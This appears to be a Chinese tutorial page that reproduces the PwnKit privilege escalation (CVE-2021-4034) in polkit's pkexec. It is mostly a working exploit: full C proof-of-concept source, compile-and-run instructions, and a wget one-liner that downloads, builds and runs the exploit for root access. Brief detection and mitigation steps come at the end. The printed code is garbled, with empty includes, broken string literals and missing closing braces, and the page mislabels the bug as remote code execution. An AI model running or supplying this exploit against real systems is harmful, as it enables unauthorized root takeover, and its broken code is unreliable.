本文主要复现2022年1月出现的Polkit的RCE漏洞
绝大多数版本linux都在本次影响范围中
漏洞检测方法:
centos:rpm -qa |grep 'polkit'
ubuntu:dpkg -l policykit-1
/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis
* Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
*/
#include
#include
#include
char *shell =
"#include
"
"#include
"
"#include
"
"void gconv() {}
"
"void gconv_init() {
"
" setuid(0); setgid(0);
"
" seteuid(0); setegid(0);
"
" system("export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh");
"
" exit(0);
"
"}";
int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
使用方法:gcc编译+执行即可
直接执行
wget https://ghproxy.com/https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c && gcc cve-2021-4034-poc.c -o cve-2021-4034-poc && ./cve-2021-4034-poc
运行上述命令后如漏洞未修复便可直接获取root权限。
centos:
ubuntu:
注:推荐该方案,这种方案下对业务的几乎没有影响
1、修改pkexec的权限:chmod 0755 /usr/bin/pkexec
2、如果pkexec非必要,可临时删除该可执行程序
注意 :
centos:yum -y install polkit
ubuntu:apt-get install policykit-1
页面更新:2024-04-29
本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828
© CopyRight 2008-2024 All Rights Reserved. Powered By bs178.com 闽ICP备11008920号-3
闽公网安备35020302034844号